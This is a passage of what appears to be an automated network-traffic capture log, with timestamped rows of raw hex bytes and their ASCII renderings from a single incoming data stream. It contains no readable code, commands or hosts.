ff d0 ac fb 10 d6 80 e1 9f 3a bf ab e5 f4 a8 61 89 7e 4d ff 9b 19 c1 63 85 5c 07 53 c3 13 9f 6f 11 47 79 73 e4 27 1e 80 c9 f3 7c 23 a5 28 77 e0 4a 26 Data Ascii: B2B`Q^i>p7<8jf& 2_GnzNs$%AL,&6@< $7H54Cm>{%z3*{:)3u6RI991"B(.kfsT<(3W34>j 1Nb2:a~Mc\SoGys'\|#(wJ&
2022-11-07 22:49:10 UTC	10905	IN	Data Raw: 89 81 be 41 7f 47 97 c3 f4 ba bd 5d 4a 7a c9 5f a3 22 8a 19 93 8f 42 d0 4a ca be 43 68 ef 8a 14 f4 65 14 16 df ab 45 9c ca 64 c2 ef 08 2b 70 9f 9f c3 b1 91 33 0e b3 22 bf 5c a2 c2 fa 01 ac 1b d7 a3 a3 54 f8 b2 ad a6 fa a8 79 29 32 c4 de 6c 2e 86 10 be a6 96 80 7b 34 a8 59 c3 12 b8 11 8e 53 19 7f 3b b1 c5 1d 97 25 8c 44 4b 90 97 95 c8 db 71 7d a9 57 35 17 6e 81 97 c5 f1 19 0b 0c ef d5 d6 5d e7 3a 66 05 55 5c 6d fb 9a d0 18 9e 4c 57 86 a3 a9 0f ae d7 24 d5 75 e1 09 c2 f1 67 9e 3c fc ac ff 13 56 a6 b2 f6 5e fd 37 57 16 0f 3c 7c da 22 d0 03 de 50 aa 13 d3 8b b2 6c f7 ed b0 1a 43 4c 70 af 1e dd 55 ac a1 78 3a b0 de 12 d6 d8 66 a4 15 f9 2f bd 6f 4d 7f 7e 26 61 1a 6d 02 dc 48 d2 20 65 e4 9b 0b 15 d2 e7 27 62 5f 4d 38 d2 80 05 e7 b3 09 ac ea b9 34 64 a7 6e dd 00 Data Ascii: AG]Jz_"BJCheEd+p3"\Ty)2l.{4YS;%DKq}W5n]:fU\mLW$ug<V^7W<\|"PlCLpUx:f/oM~&amH e'b_M84dn
2022-11-07 22:49:10 UTC	10921	IN	Data Raw: 57 d0 6e f6 90 ae 23 c2 4b 6f 71 f3 2b 29 9c 78 c2 09 ab 92 8c 73 73 83 44 b7 fa ad c7 15 75 cf 04 69 ee fe 71 34 c9 0d 7d 5e 9d bf 3a 13 9f 66 77 e0 2d 68 25 b0 9b 1b 60 7a 75 19 b9 75 87 bc b0 36 59 e2 ec 84 74 93 7a 09 e3 dc f6 d5 bd 86 26 15 f4 4d e2 fb 66 6e 7d 9d 11 7d ee b6 52 dc fb 64 e0 3e 29 09 3c 96 82 89 6c 18 bd 11 31 26 cb 3e e3 e7 b4 50 6d 97 1b e9 f7 e8 c3 a9 bd 9f 2c 43 27 b7 ec 6c aa 96 63 f3 e1 08 f6 82 08 ec 74 c9 cb 1c c6 e9 09 d8 d2 e4 7f 96 fc c0 e6 51 01 97 d0 49 46 15 f9 e3 c5 96 24 a7 36 c4 6e 80 e0 87 89 92 07 dd bb f9 25 97 10 c6 20 4f f1 77 58 bf 29 10 06 17 fe ca 4f b1 7d ef 0e 03 3b fe 62 b7 59 8a 4b 1b 75 2e cb dc 6c b6 3f cf 3d eb 7b ba 9d 1f c2 1b ce b7 83 f6 da 1c 95 56 0e c7 db 78 ab 8a 6a dc 40 dd d1 5c 93 99 78 d0 a8 Data Ascii: Wn#Koq+)xssDuiq4}^:fw-h%`zuu6Ytz&Mfn}}Rd>)<l1&>Pm,C'lctQIF$6n% OwX)O};bYKu.l?={Vxj@\x
2022-11-07 22:49:10 UTC	10937	IN	Data Raw: 74 3b 2c 4d d3 d8 89 bb 5b a6 cc 6e ec 0b f5 ae b1 79 56 24 56 94 cf d3 e8 9e eb d3 52 3c 57 69 b9 64 79 18 88 8e dc c9 dc ee 3c bb 0c 1c 8b e8 73 90 60 e5 0d 75 f3 a9 c8 79 83 9e d9 56 5d d6 ec a3 d2 1b 9a e9 5f e0 19 da ff fd 0e 64 d1 73 1d b0 1c 58 fa dd 4c 5e b2 ad d9 b7 0f 43 1b cd 22 31 73 32 56 7e 24 43 85 81 60 d9 eb 9a 21 f6 a0 81 8f 78 ed aa d9 59 85 77 fe d7 e8 a9 7c e2 01 7b f1 3d cd 7c be a3 9d 4f 44 3c 19 e7 8d 75 fa 30 be b5 0d 8d 32 73 46 ac 81 ba 56 7b 08 7b 9a aa 53 0e 6e 89 f8 1f 46 8a bd 9f e5 46 03 6e 66 c3 e7 56 e1 e6 51 8b af a0 45 5f 34 cd 67 1b 27 f5 92 6c 42 00 5d 47 12 d8 9a 5f d8 0e 7f 8d f0 22 8d c1 40 8c 53 42 6e 6f 46 c0 1e 54 ff 1f cd 88 2f 5f 6d c1 46 ca cf 86 47 d8 93 ad 11 f4 9d e9 f9 bb 09 aa f2 4e 91 d4 5a 3a 45 bf 39 Data Ascii: t;,M[nyV$VR<Widy<s`uyV]_dsXL^C"1s2V~$C`!xYw\|{=\|OD<u02sFV{{SnFFnfVQE_4g'lB]G_"@SBnoFT/_mFGNZ:E9
2022-11-07 22:49:10 UTC	10953	IN	Data Raw: 78 78 0f ed 88 c3 18 5e 5a 26 fd 7c 5c d9 b9 81 ad d1 0f 4d 31 7f 42 2e b9 f1 dd b8 c1 41 b2 f3 17 b1 94 05 e2 2f ab ca 1d 2a 96 59 6e e8 d5 38 20 ec eb 4c 2e 2e 71 e3 c9 e6 18 29 17 17 20 13 bc 64 35 fe b5 55 5a af e1 fe 50 6e 0f 4b ea dd a4 1b df 73 a8 3f d7 5e 13 af 51 a6 bf 87 01 52 a8 9f 98 92 cf ff 9b 4e a3 66 a6 84 67 de 0e 51 8c 62 61 25 69 41 a0 0c 5d 9b 8c b4 88 eb 7a 5a 2a b6 11 85 6c 6f da 1e 99 1d 93 ec d1 70 e6 71 61 02 e6 bf ff 03 86 ef db 89 40 dd 96 86 58 8f d5 34 d3 cf d5 2d 58 73 5e fe 52 62 fd 71 53 8b ae 1f 89 7d fb 5a 25 a6 18 97 b4 5d 70 2f 6f 66 99 eb 3c e7 f3 42 c3 00 e8 9c 60 46 cc 34 f0 98 31 da 1c a4 06 68 d2 28 40 a5 61 4f 3d cf b6 b7 8f af fa 28 71 84 d0 65 b2 56 4f 67 90 e5 41 08 e2 3a 4e c6 a2 14 ef 84 eb bc ad 84 c6 bb b5 Data Ascii: xx^Z&\|\M1B.A/Yn8 L..q) d5UZPnKs?^QRNfgQba%iA]zZlopqa@X4-Xs^RbqS}Z%]p/of<B`F41h(@aO=(qeVOgA:N
2022-11-07 22:49:10 UTC	10969	IN	Data Raw: 44 47 a1 70 74 af 44 4d 85 f5 b1 19 84 43 f4 84 79 e3 bc 2a 35 ba 68 42 d7 23 67 34 15 b4 b8 4a 93 f9 0d 61 cc cd e2 5c f4 00 7b d7 22 cc c3 86 f9 0c ed c7 22 79 32 30 2a ce c6 5a aa e6 1f 25 a1 e0 e3 96 44 ac 6d 1a 93 c4 31 d5 1d 1b e6 b0 ed 22 24 46 1c 10 fd 9f e4 87 e5 a9 2e 96 a8 5c 8d 1b e1 b5 40 f0 1a 75 b0 24 a6 4e a6 47 72 2c 50 92 8a e7 f1 2f 10 0d 7d a8 3e 1c 99 9c 75 1b 83 0e c7 d1 1f 81 29 e4 4d 4d a5 13 f7 62 0c 54 b9 5c 6f 47 63 26 44 12 9b 9a c5 55 59 11 2b 50 ca 50 8a 44 27 74 c9 af 90 d8 7b 88 15 6e 57 f7 7d ce 44 39 f7 92 09 4c 5e 7d 72 ec 2c c0 13 6b e1 c4 47 6f 96 cf 6a f6 ba 01 62 25 78 6b 98 a3 72 d5 73 4d 7c 10 ce e6 a3 5f 03 98 87 f3 56 f2 31 b0 4f 8f 18 e3 7b 65 78 40 94 af cc 85 0b 87 65 82 3c 2c ca fb cb 95 44 d2 38 a0 5d c9 d5 Data Ascii: DGptDMCy5hB#g4Ja\{""y20Z%Dm1"$F.\@u$NGr,P/}>u)MMbT\oGc&DUY+PPD't{nW}D9L^}r,kGojb%xkrsM\|_V1O{ex@e<,D8]
2022-11-07 22:49:10 UTC	10985	IN	Data Raw: 70 46 a0 de d9 55 b5 9a ba cf 9b 6b 7c 3c 76 61 e4 e3 9b 5c 1f 0d ec ca 0e bb 74 7f df e8 62 5c 16 16 6a 79 63 2b c0 5e 46 35 6f 94 a7 8d c8 43 39 3a 0b 43 84 c4 0b 0e 92 a7 a6 9b 4d c1 6c 19 b7 25 ef 0e e9 66 01 9b a6 7a 09 38 c7 89 ac f6 79 73 d8 50 4b 9b a5 57 73 7f 20 f0 1d e0 53 c8 5b 20 e2 e9 b8 cf d9 f4 05 e2 04 b0 da 19 2c 43 c6 7f df 66 ed 57 0b f0 f4 77 2f d8 4c 17 92 3b c7 b8 1e 9e f4 4e 71 34 f1 82 86 23 0d fb b9 28 d5 49 80 47 23 ee 32 9c 1c 15 46 98 a3 53 9b 43 09 9c fb e9 e7 66 90 85 87 c6 f9 7f b4 b5 d6 9f ba df c6 49 55 32 9f b6 37 59 22 58 32 6e a2 6a 9b 48 d8 04 13 a7 57 88 f8 17 d0 7a f1 04 66 b9 5a ff e7 6b 35 49 09 72 05 23 f0 23 56 6d b6 62 ab 42 95 a3 57 d3 3f 23 04 f8 15 d8 36 51 db d5 40 d7 36 6b 8d d3 da 01 c5 78 27 75 fa 0d c0 Data Ascii: pFUk\|<va\tb\jyc+^F5oC9:CMl%fz8ysPKWs S[ ,CfWw/L;Nq4#(IG#2FSCfIU27Y"X2njHWzfZk5Ir##VmbBW?#6Q@6kx'u
2022-11-07 22:49:10 UTC	11001	IN	Data Raw: be 8c d4 fa 87 80 77 23 a9 70 06 be 18 d1 d2 09 73 7c 89 6f 34 fe 48 45 45 d2 ee 3e e8 19 36 30 35 55 6c 4a 64 ff f0 eb 8b 28 e0 21 f1 aa 08 58 ab 71 75 99 9d 21 a3 6f 36 ed 53 27 ee 44 08 9c dc ef 0c 82 62 59 c7 71 9f ee a2 d6 20 14 bd 39 3c 40 3d 43 68 81 65 e2 cf a9 20 4b 8c c0 13 fe 37 e4 58 2b 2e d5 41 af 4e b3 b2 a9 a4 cb fe c6 a2 fe f0 4c 5c 3e 1b 08 56 e4 0a 44 72 89 b6 9d d2 df 91 67 37 23 2c a7 91 4c 0c 14 8f af b0 ae a5 7c 15 49 f6 3a 3c 69 e4 d3 c3 a5 ef f3 0b 7b c1 aa 05 11 11 e7 f9 a9 13 fc 4d f6 d6 27 e7 0b 50 46 cf fd f2 47 bc 0c 82 e1 89 81 7a 47 13 5b 82 e6 f2 cf 76 99 29 16 d5 b6 87 b7 a8 40 97 cd a1 32 88 83 c2 42 c8 1c af 78 0a 89 cf 8a 86 e6 8b c4 fb 1d 3c b5 24 4a c4 97 73 d6 b8 70 48 2f 57 b2 c6 56 19 d5 dc ce a4 c6 2b 7b 82 09 8d Data Ascii: w#ps\|o4HEE>605UlJd(!Xqu!o6S'DbYq 9<@=Che K7X+.ANL\>VDrg7#,L\|I:<i{M'PFGzG[v)@2Bx<$JspH/WV+{
2022-11-07 22:49:10 UTC	11017	IN	Data Raw: 45 d7 f6 8c 9a 00 b8 33 d6 ce c3 39 c7 a8 01 eb 52 29 7a e0 7c 43 b5 c1 91 8f 49 e6 f1 67 b8 5a 92 f3 61 41 d8 5b c2 84 5d c3 c0 1b 9d 7a 49 61 f6 89 e3 bf ce d1 39 71 18 a3 44 09 f1 b4 07 4e fe 65 39 b7 ef 2d c1 69 1f 44 e1 83 8d b3 18 3a 97 41 83 3d 2d 76 98 2f 14 af ce 27 f6 fd f0 15 13 4a 7e 9e 51 46 f3 50 66 26 d2 a1 fd 43 b7 14 44 dd f8 1b ad 9b 0f f2 c5 2d 35 9a f5 06 e0 a2 da 1c dd 7d cf 9c 1e e7 59 df 29 ef 00 a6 5f 52 fb eb ab 0d 8a aa 45 0a 80 6b 2c bf 2d 52 32 82 18 d3 ca 66 b9 db 86 1f 3c e2 d5 3a a2 af 1d 62 10 b4 da 21 14 d0 4d 8a dd 6d aa 7c 6e 86 76 ee 7a 40 25 03 a7 33 0c af ff ed 56 1e 6c 80 80 bc bd 9a 2b 75 c9 50 a9 2a 39 92 3b 57 0c 3f 33 ca f3 b3 f4 1d 4f 51 70 e0 72 da cb fb c8 dc 46 bc 9f 08 66 65 fc 7d 66 02 87 a4 6f 94 a8 07 56 Data Ascii: E39R)z\|CIgZaA[]zIa9qDNe9-iD:A=-v/'J~QFPf&CD-5}Y)_REk,-R2f<:b!Mm\|nvz@%3Vl+uP*9;W?3OQprFfe}foV
2022-11-07 22:49:10 UTC	11033	IN	Data Raw: 4b ff 1c 0d 04 8e 4c 10 00 d6 9d e5 8f 2c 50 b8 65 d3 50 66 65 d1 da bb b9 49 91 94 d8 18 a2 d3 4d 37 f9 5e 49 75 0d 7a f3 f5 95 07 41 a5 5f 19 e0 1a 1c 99 aa 2f 7b 93 cc 6a 8e 4f 0f 79 dd 43 c3 da 37 b1 60 83 14 bd 41 ba 8e 54 ae 4d 26 62 a6 69 84 9f 03 fb 3d 3b 10 69 3a 0c e0 55 4a 48 96 3b 05 20 a2 b3 69 a0 e5 e0 3c 58 91 76 95 74 0e 8f b5 21 7c 5c 48 37 26 04 c7 8d 8f 25 c7 43 f0 81 6a a0 f6 d4 47 cd e7 00 2b 63 1c 08 23 ac ea c7 01 f4 67 ec ee 95 88 d8 09 c9 1d a8 0a a9 26 79 db 65 18 68 09 e3 64 4e 81 2b 6c 1b b6 56 18 bf c6 50 8f 36 65 9a ec 7c 6f bb 5d be f1 4b ae a3 03 da 96 16 0c 60 97 9e fb 43 ac a3 4d c1 50 34 05 9d 45 45 b5 b4 e2 de fa ef 87 e1 f9 14 84 ce b7 ed 3b 13 ef c0 52 5e f9 be b2 cc 07 c7 34 25 c6 f0 96 30 17 c4 2c 07 ec 70 4d 1e 61 Data Ascii: KL,PePfeIM7^IuzA_/{jOyC7`ATM&bi=;i:UJH; i<Xvt!\|\H7&%CjG+c#g&yehdN+lVP6e\|o]K`CMP4EE;R^4%0,pMa
2022-11-07 22:49:10 UTC	11049	IN	Data Raw: 14 aa ff 64 89 91 6d 92 61 e6 ac 93 95 62 2b 2d db 37 c7 c9 d6 37 64 91 40 89 51 81 a6 9b 35 96 dc 57 a3 db 82 60 d9 e5 e5 c4 4d b6 9a e6 10 70 31 6d 51 69 03 3a c4 27 71 3f e7 8d 98 96 4d 19 31 ce 0f d1 96 7e 63 0b 12 9d 31 0b ab 05 ef 79 aa 63 7f 50 9a 8a cf 8d 9e 05 3d e9 a2 fe 97 fc 9e 63 8f 55 f2 02 85 64 db 47 cd 80 d2 f0 82 6a f3 c9 c7 c6 ef 6d c6 0a 27 1c f9 41 af aa f7 84 fc e3 29 8f 4b 4c 3c a7 58 0d fc 20 b2 9e 98 14 6c 8d 65 6b 88 c6 d7 86 20 d7 dc f1 ec 62 62 27 7b 04 cd 44 20 55 4d f9 55 f1 d4 8c 13 53 43 23 ec e0 8f e5 f0 0b 96 6d e1 62 31 e6 21 2a 81 f0 4c 5e e0 ee 0d af 71 19 f8 ac 84 0c bb 6b 6c df 93 40 32 1e ad 2d f8 58 50 e3 74 e4 84 da 83 b4 bf 3c c0 ae 60 d4 fb 16 67 a9 3e 94 68 d2 aa 32 7c a1 8a 6a 2f 43 dd aa 82 fe b6 ff 28 0a 2b Data Ascii: dmab+-77d@Q5W`Mp1mQi:'q?M1~c1ycP=cUdGjm'A)KL<X lek bb'{D UMUSC#mb1!*L^qkl@2-XPt<`g>h2\|j/C(+
2022-11-07 22:49:10 UTC	11065	IN	Data Raw: fe 7a 2b 80 14 b3 b4 78 24 a1 ce 59 97 f3 43 fd be 8a 70 52 8c 6e 35 b5 0f a7 18 36 ec c8 47 2d 98 e6 64 8d 2c 8e 92 97 eb e7 83 30 d2 4f d2 5c 71 fa a0 d1 ca 4d da d1 db 4c 7c fe 89 db 7e 85 06 07 df 5d 01 a9 fc 43 4f 1c 59 0a 53 3b 32 62 80 03 08 c3 cb 2c 50 f8 ed 5d d6 04 d9 37 23 2f 37 cf 8b d5 53 8f 47 2b c8 19 77 57 1d 09 cc f0 cb 14 d8 1e c6 e6 c6 56 37 6b 02 71 1d 72 dc b5 18 9f 9d 16 63 02 fd 2b 71 31 bf e8 cf 44 3e 1b 34 17 7c 08 76 37 08 ef bc b1 ed d4 da 20 ca ea f8 be 5f 91 7d 57 82 27 9c 9b 2e e3 0f d2 20 d7 25 31 0a c2 c3 3c ad 9a ae 70 27 b1 d1 34 1f 00 24 b7 6e d7 27 6c 39 b8 b4 b8 6d 80 40 3a 72 a7 96 94 27 7c 9d 07 c6 e0 74 04 72 c8 3b cd e9 1e fe 67 7f a1 25 3a 52 48 a4 cd 8b f0 68 18 02 28 23 31 0d f1 20 44 d5 e3 43 76 9c 2b 5b 85 b7 Data Ascii: z+x$YCpRn56G-d,0O\qML\|~]COYS;2b,P]7#/7SG+wWV7kqrc+q1D>4\|v7 _}W'. %1<p'4$n'l9m@:r'\|tr;g%:RHh(#1 DCv+[
2022-11-07 22:49:10 UTC	11081	IN	Data Raw: 8b 5a 38 77 98 1f 67 aa 22 06 e6 cc 17 ca c7 48 c0 3f c6 a9 51 d1 59 62 53 4e a7 b3 83 67 9c a2 33 00 31 3e f8 43 a1 64 82 17 3e 23 e6 df 57 c7 27 f3 6c 22 e5 63 18 9d cf f2 e2 94 92 da 34 e1 13 e1 9a 0a 8b fb 5a 50 17 d2 99 aa 8c e9 f4 0e 19 53 7d ac 19 e0 e1 d5 7c 86 32 f3 31 77 ca 65 6e 97 16 36 f4 2a 1e 01 90 8e 7e 3d a8 7c c0 45 ec 53 9f b0 8d b0 66 a3 ec 9c 3b 75 07 89 18 a1 0e 8d 5e 46 1a 1c 4d 11 ea f6 ea dc 89 f2 70 3a 90 8e 0d da e7 a6 2e f1 48 39 c5 a5 ef c0 28 ba 65 ab 2a f9 51 1a b4 1d e4 07 86 c8 ce b7 59 b8 0a 29 30 df 55 59 f3 33 d7 0a ee c9 e7 66 ab 84 87 31 5d b8 6c 93 d7 25 e2 6e d8 7d 56 36 a9 ca 8d e6 67 82 a6 24 a5 b1 fa 83 8a 3d 14 95 4c 28 2c 2e c5 21 39 f0 bc 01 2e e9 0a 7d d0 68 35 18 db b3 6e a3 f5 b7 23 2f c1 29 19 4e 4d 65 4a Data Ascii: Z8wg"H?QYbSNg31>Cd>#W'l"c4ZPS}\|21wen6~=\|ESf;u^FMp:.H9(eQY)0UY3f1]l%n}V6g$=L(,.!9.}h5n#/)NMeJ
2022-11-07 22:49:10 UTC	11097	IN	Data Raw: c8 87 b5 33 84 f9 48 5a 05 01 17 d8 3d 56 4d 1f 18 ab 39 b5 52 40 f9 5a 75 7f ec 6f fa 0a e7 24 c9 d2 2b 00 cf b7 32 af a8 15 21 f5 71 42 20 9b e4 87 2f b1 5b 45 4a 1a 46 a1 e4 ef fe f7 d3 eb bc 3b 85 53 1f 69 f3 c3 2e 17 60 83 be 9c 5e 80 95 76 17 10 80 d4 20 03 d6 0b d1 a5 c6 81 cd 44 5c d0 69 df cd 37 b9 4a a1 ec fc c5 1f 59 ff bc 34 a4 97 90 7a 60 a6 96 4f 3d 1a 3e c0 f9 a5 9d 38 c0 b9 2a 02 fb 71 e6 f1 1c 68 7a f6 df f7 6b aa 35 3c d0 c2 9b 8f 67 30 10 6e 6e 56 fa de 2c 63 ec 7d 6a ae 6e 8f 25 8d 95 b8 c0 44 3c d2 ae e2 62 87 cb 8f fa 2c cc f2 7a ce c1 c9 bf e2 5d 97 bb 01 db da 7f 66 9d 24 8c 9b 06 c8 d1 6d 08 a3 93 14 01 d1 00 18 9d 61 da e4 a8 60 ec 15 5d 62 12 f0 ea a0 14 7c 56 70 e8 41 e2 e2 47 56 fa 97 fb 69 0b 8c 77 fe 67 52 15 fc de 53 1a 05 Data Ascii: 3HZ=VM9R@Zuo$+2!qB /[EJF;Si.`^v D\i7JY4z`O=>8*qhzk5<g0nnV,c}jn%D<b,z]f$ma`]b\|VpAGViwgRS
2022-11-07 22:49:10 UTC	11113	IN	Data Raw: 48 08 32 a9 27 01 a1 c2 8c 79 e9 ff 08 16 c9 a3 79 0c 9f 5e 5f dd ee 57 f0 06 f9 53 95 d7 ca b7 fb 56 9a 6f 5a 7f a2 ae e6 af 2f 05 dc 24 fb cc 41 f7 c8 dc b8 06 52 65 60 ca ef a6 c6 f4 03 f1 54 aa 46 03 dc 75 a7 62 c0 a1 70 1e 19 ca 65 91 58 89 80 92 90 b6 0e 62 91 30 bc 17 e8 f2 87 09 22 12 47 fd e3 fb 73 02 8a 0d 05 31 c3 04 0a 00 10 cf 06 a9 98 12 69 34 a2 11 53 3d bd 7f 78 93 0c bc 6f b7 b9 7b 9c 1e d7 ee b4 97 59 95 ab 41 73 6e 4d 06 b6 6a 7d f9 b6 f0 18 24 cf cb bd 62 f9 74 dc 10 f8 6c 6e f5 a9 e5 73 67 75 b6 48 e3 d0 56 fa 2a 14 7a 92 dd 0d f6 e2 ff 3d 21 7d 44 97 ce 0c df 1c bb d2 05 c5 ac 63 9f cd d2 83 be 6c 19 ab ae a3 1b f3 da 9a 27 e0 64 77 62 17 93 f8 86 a6 77 46 61 1d df 5e 98 96 d4 05 cb ca 13 61 e4 e4 01 66 e9 cb 55 35 01 a4 74 21 89 86 Data Ascii: H2'yy^_WSVoZ/$ARe`TFubpeXb0"Gs1i4S=xo{YAsnMj}$btlnsguHV*z=!}Dcl'dwbwFa^afU5t!
2022-11-07 22:49:10 UTC	11129	IN	Data Raw: 5d 3f dc 01 42 25 38 c3 c9 4c bb 48 da eb 82 20 78 d4 fc 69 61 39 07 0b 0d 40 1f b2 14 8d b1 f6 ce ba 2c 43 c1 25 55 bf a3 90 5a 17 8b 41 0f 0e c0 43 10 e4 72 74 50 07 41 cf 3d 7c 51 90 a4 4e d5 e1 c7 27 6d f7 46 30 ac 35 40 2e e4 d1 b5 41 bb 34 fb 33 e2 8d de 15 eb cb e1 a2 cf e2 e3 76 ba e1 ec 01 47 65 57 59 92 1a 61 f3 ee 02 9a 3d d7 99 3a 6d a6 26 ee 5c 50 3d 73 bd a7 60 c3 84 ba 05 b4 f4 37 4b c0 01 ed 06 6e 4b b9 d3 92 98 00 b4 8d 4c 3e ef 1a 84 91 41 f0 2e ba 52 99 01 c6 7c 75 00 ac c8 db 24 68 7d 90 5f 08 b6 ed 15 47 68 f0 72 6d a2 40 ff 9e 6a 87 05 db 10 a6 5a 2a ba 40 69 64 92 1e 09 86 e2 39 b2 8d 3a 1e de a5 e3 80 49 e8 18 29 b9 ca 48 af 73 ad 99 c2 80 59 1a 03 d7 78 d4 2c 23 7e 24 e8 65 db c6 c8 78 14 f3 de c2 f5 20 64 2d 29 2b 97 24 b6 cd 79 Data Ascii: ]?B%8LH xia9@,C%UZACrtPA=\|QN'mF05@.A43vGeWYa=:m&\P=s`7KnKL>A.R\|u$h}_Ghrm@jZ*@id9:I)HsYx,#~$ex d-)+$y
2022-11-07 22:49:10 UTC	11145	IN	Data Raw: b1 87 19 0e 55 a5 d5 af 78 c7 f4 f8 db ae e4 42 df 36 81 91 e5 5c e0 e3 e3 e2 86 65 4d b6 b9 cf 72 0a 46 8f a5 e1 84 38 38 f2 fe 58 92 7d f6 af 2e 23 63 a6 62 e4 a4 d7 56 cd bc 9a c1 3c b1 40 5d 0a 29 4f 3b 5b fb e9 87 04 9f 70 83 6c 75 e6 6d 0c ed 29 72 13 83 e0 21 cc fb 2a bf 79 79 1f 24 b3 d2 b4 fa 6c ca 72 97 61 76 5b ba 49 4f 8e 63 a7 82 60 bc c3 ff 53 54 d1 e8 1c b5 a3 0c 03 9c 8d 37 3f 2e 02 af 90 87 cd a8 6a a8 ed f1 aa 4a 21 61 74 57 ce f6 1b fa 64 91 bd 52 fe 84 80 d1 68 b2 d2 00 11 50 8d df 98 15 10 48 6a 2e c7 ad a5 60 cc e8 32 c8 43 98 7b 35 07 b3 5d 17 ef b3 d0 d2 7e dc 64 df 3a 4f 2c ab f1 b3 71 73 fb 18 88 b0 2d ff 49 c9 ca 75 6b 2a af 08 65 de b8 30 f5 43 4e 23 ef 79 35 7d 18 b8 14 5a 2f b7 06 79 47 a6 ce 16 a4 0d 81 f3 ae cf 95 f1 c8 d9 Data Ascii: UxB6\eMrF88X}.#cbV<@])O;[plum)r!yy$lrav[IOc`ST7?.jJ!atWdRhPHj.`2C{5]~d:O,qs-Iuke0CN#y5}Z/yG
2022-11-07 22:49:10 UTC	11161	IN	Data Raw: 4b 65 cf 95 bf 3c 0f d9 28 36 47 54 a3 c6 e3 5f 17 e9 58 bd de bb 8c b7 11 ba 51 57 46 14 e2 28 24 da 05 df 72 5c 02 96 25 9d 37 af cd 02 d4 52 9f 23 32 85 b7 16 9f 0e 42 1c 65 b9 a5 32 a7 e8 de 28 4f 92 09 10 b8 cd 66 9a ce f7 0f b0 4e 01 81 14 ba 70 01 d4 03 08 e8 5c ed 73 2a cd 01 cc 7d a3 2e 50 eb 73 a9 ef 09 a9 46 76 80 5a 12 ac e3 c2 9f 0e f2 d0 80 a2 ef 82 16 f9 ff 61 2b 80 66 4e 4b 00 e1 db 15 27 38 7b 5d 13 16 88 8d 0f f7 94 18 b1 33 33 d2 a5 97 49 55 f1 74 c3 53 5f 0a 76 f0 d1 c2 7f dc 5d 76 cd b4 d2 b0 23 f8 b4 56 ed 04 cf 1e 4d 73 6d d3 d2 0d f8 eb af 4d f1 b8 e8 b5 da 6f 14 17 05 9f 29 87 6f 13 0d 53 bf db b0 e4 db 6b 40 f7 8b e1 48 1a d8 0e f1 62 65 7b 9f 37 7c 0d d4 a8 44 dc df db e0 cd ba 91 72 6f b5 c3 e3 82 70 10 10 34 82 16 2b da 22 dc Data Ascii: Ke<(6GT_XQWF($r\%7R#2Be2(OfNp\s*}.PsFvZa+fNK'8{]33IUtS_v]v#VMsmMo)oSk@Hbe{7\|Drop4+"
2022-11-07 22:49:10 UTC	11177	IN	Data Raw: ed 1d 9e 66 d3 12 cd fe 91 b9 4f 99 5e 82 37 37 df 6e 60 25 f1 61 88 2a 9c cf 7a 7d 68 ff 88 13 b8 88 a0 91 b7 17 ed 9b bb d7 3d 0f 4f cd 47 91 9d 68 ed d9 cb 8f 72 9b 39 01 58 a5 08 c9 7f 42 30 fd c8 46 41 7e 08 22 be a9 79 5d 90 dd ca 8f 6e 6b 7b ab b6 3c 52 f5 23 a6 34 6d 01 b2 ea ec 35 bc 36 27 4f d6 7f 53 f6 cf 0d 3c 50 cb 30 58 3a 03 ed 93 22 53 d6 0d eb 71 7c b7 4c ec 51 dc ce 6a 6c f3 7e 63 c4 a5 1c c5 de 58 72 9c 77 a2 1e b6 7b 49 7b 08 51 06 8a 61 9a 1a e2 65 52 f1 0d 15 1d 6a 03 4f a7 e5 3a 98 59 e5 84 71 05 60 1f 58 a0 9c 64 4e f5 ad 92 ef fc 68 0d 20 25 34 66 f3 b7 56 aa ef c5 05 98 5b 9d fc d7 87 b5 29 04 4c a8 4f d5 cc 08 f1 ef 66 d3 06 cf 80 99 cf 14 20 74 53 f2 15 df 42 62 c1 57 2a b4 1d 92 db e2 f0 77 41 77 8a 55 b3 9e 2e c0 c8 94 2b c5 Data Ascii: fO^77n`%az}h=OGhr9XB0FA~"y]nk{<R#4m56'OS<P0X:"Sq\|LQjl~cXrw{I{QaeRjO:Yq`XdNh %4fV[)LOf tSBbWwAwU.+
2022-11-07 22:49:10 UTC	11193	IN	Data Raw: 8d 67 43 f5 c2 ed c8 0b f3 83 be d2 b1 ef f1 e2 4e 2f 23 5a 2f 49 5c a0 ef db 40 9c 99 69 41 59 1b b8 e4 c2 e1 85 fc 17 38 a9 d8 27 56 9b 23 53 5a 2d e4 68 99 ff e2 c6 e6 8b ac 26 93 49 02 82 53 46 72 c8 74 0e ef 66 b9 6c a4 bf 10 49 41 36 35 26 96 d7 98 21 a8 02 52 29 74 63 07 de 21 7a 2a bf a1 35 3a 45 27 40 04 92 26 47 97 dc 92 54 8b d6 4c e6 49 fc fc ea 31 14 05 34 a2 d8 8a 36 a5 0d e4 be f2 84 4d ab b5 a3 f6 1f ae 07 01 80 b1 7d c7 59 44 92 0a 1b f3 3b 94 ca a7 6d a3 cb d2 5a 28 83 b7 1e 30 32 cc c3 01 ab e1 bf 59 c8 1e 45 a1 70 2f d2 85 e6 9d f8 e8 5f 28 99 66 6b a8 62 55 58 f1 a4 0b af df 0e b9 32 be 35 86 51 e2 73 41 db 27 94 ca df 20 a1 ad e7 53 56 e9 29 34 16 8d 03 e7 d0 19 a6 63 8a 59 7f 3a ef b6 eb 31 49 85 67 8e a6 cb 76 0b af 1c dc 77 88 8f Data Ascii: gCN/#Z/I\@iAY8'V#SZ-h&ISFrtflIA65&!R)tc!z*5:E'@&GTLI146M}YD;mZ(02YEp/_(fkbUX25QsA' SV)4cY:1Igvw
2022-11-07 22:49:10 UTC	11209	IN	Data Raw: 5d 5b 3d 27 5f ab 82 23 49 b2 59 a9 52 ef e3 14 fc 17 ae a1 66 1f 75 60 1b ef d8 74 ad 69 ef 87 91 bc 18 1b b7 25 09 52 60 23 07 bd 06 be 95 e7 5b ff bf af a0 8d 0f 5b 9e 77 f2 04 56 93 cf 94 ea 71 af f0 97 cb 2c ae 7a 19 36 0b 75 54 65 59 29 28 d3 71 76 56 f6 cb 5e bf 9b 99 76 89 38 28 1b 5e c4 c3 56 92 2e 83 4b a9 8a 5c 4e a7 7f 17 0d 12 9e 35 b5 cd 84 d8 cd 7b 5f 4f f9 d2 d7 6b f9 8a a2 c3 39 de f8 69 6e 10 f5 13 2d 04 b5 ba 12 72 74 5b 6f 5c 48 b2 81 b5 6c a4 de 40 39 9d c6 db ae 02 7c 46 d8 7a 46 57 b4 2b 13 4e 85 b7 39 df dd 98 23 33 b8 20 0c 4d b5 1a c8 41 27 13 f6 7b 67 